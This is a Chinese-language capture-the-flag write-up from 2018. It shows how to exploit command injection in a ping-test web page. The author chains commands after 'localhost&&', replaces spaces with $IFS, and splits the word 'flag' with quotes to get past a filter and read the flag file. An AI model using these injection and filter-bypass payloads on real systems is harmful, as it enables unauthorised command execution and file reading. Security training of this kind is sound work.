xp0int Posted on Oct 31 2018 (比赛题目可能有改动,做法没变) 首先是一个网络测试页面。 ![title](https://leanote.com/api/file/getImage?fileId=5bd56467ab64417fbe0028e3) 随便填点东西。 ![title](https://leanote.com/api/file/getImage?fileId=5bd56471ab64417dd6002947) ![title](https://leanote.com/api/file/getImage?fileId=5bd5647bab64417dd6002949) 出现?site=what的GET参数,猜测功能是输入一个ip或域名进行执行ping命令。 ![title](https://leanote.com/api/file/getImage?fileId=5bd56484ab64417dd600294d) 尝试命令注入。 输入localhost&&ls: ![title](https://leanote.com/api/file/getImage?fileId=5bd5648eab64417dd6002951) 输入localhost&&ls /etc: ![title](https://leanote.com/api/file/getImage?fileId=5bd5649aab64417fbe0028ec) 结果相同,可能是因为把空白字符之后的内容删除了。 输入localhost&&ls\$IFS/etc (\$IFS变量储存了一个空白字符): ![title](https://leanote.com/api/file/getImage?fileId=5bd564ecab64417fbe002912) 命令正常执行了。 输入localhost&&ls\$IFS/: ![title](https://leanote.com/api/file/getImage?fileId=5bd564f6ab64417dd600296b) 发现flag文件。 尝试读取,localhost&&cat\$IFS/flag: ![title](https://leanote.com/api/file/getImage?fileId=5bd564feab64417fbe002919) 应该是服务器拦截了flag字符串, 把路径分割来绕过,localhost&&cat\$IFS/fl''ag: ![title](https://leanote.com/api/file/getImage?fileId=5bd5651fab64417fbe002920) flag{P1ng_10c41h0st_c4t_f14g} 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Math] C8: captcha [Web]fakelogin2
没有帐号? 立即注册